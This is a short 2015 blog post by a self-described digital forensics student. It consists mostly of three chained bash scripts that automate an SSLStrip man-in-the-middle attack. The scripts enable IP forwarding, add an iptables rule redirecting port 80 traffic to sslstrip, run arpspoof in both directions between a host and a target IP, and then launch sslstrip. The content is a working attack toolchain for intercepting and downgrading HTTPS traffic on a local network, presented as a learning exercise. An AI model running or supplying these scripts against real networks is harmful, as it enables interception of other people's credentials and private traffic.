Intro

I am a Digital Forensics student studying at university in the UK. I also do some Cyber Security modules.
I am currently in my 2nd year.
I have mainly started this to post interesting things I have learned and problems I have encountered.
However, I will use it to do write ups about useful things I want to remember such as commands and tools I have used so I don't forget them! (To be honest, I don't expect anyone to read this!)

Wednesday 25 February 2015

SslStrip Bash Script

I had some headaches making this. Figured out i was doing things in the wrong order!!!!!

Right, so, its not perfect. Its in multiple scripts for the moment whilst i try to figure out a way to get them all running from one script and not having to re-type in Port numbers and IP's!



So this is "SSLSTRIPSETUP" - This just sets up the IPTables entry and calls a modified ArpSpoof script:
#!/bin/bash
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "What Port Would You Like To Use For SSLStrip?"
read PORT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port "$PORT"
./ARPSPOOFSSL

This next script is the "ARPSPOOFSSL" - This is the same as my original - it just calls "SSLSTRIP" at the end:
#!/bin/bash
echo '1' > /proc/sys/net/ipv4/ip_forward
#Ask for 2 IPS
echo -e "Please Enter The HOST IP"
read HOSTIP
echo -e "Please Enter The TARGET IP"
read TARGETIP
echo "You entered: \"$HOSTIP\" \"$TARGETIP\""
echo -e "Are you using wlan0 or eth0?"
read NIC
echo "Preparing........."
echo -e "\t\t Target: $TARGETIP \n"
echo -e "\t\t Host: $HOSTIP \n\n"
echo -e "Starting ArpSpoof"
gnome-terminal -x arpspoof -i "$NIC" -t "$TARGETIP" -r "$HOSTIP" 
gnome-terminal --tab -x arpspoof -i "$NIC" -t "$HOSTIP" "$TARGETIP" 
./SSLSTRIP

 And then this is "SSLSTRIP" which does the actual "sslstrip" command.
#!/bin/bash
echo -e "Enter Port Number:"
read PORTNUM
gnome-terminal -x sslstrip -l "$PORTNUM"
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)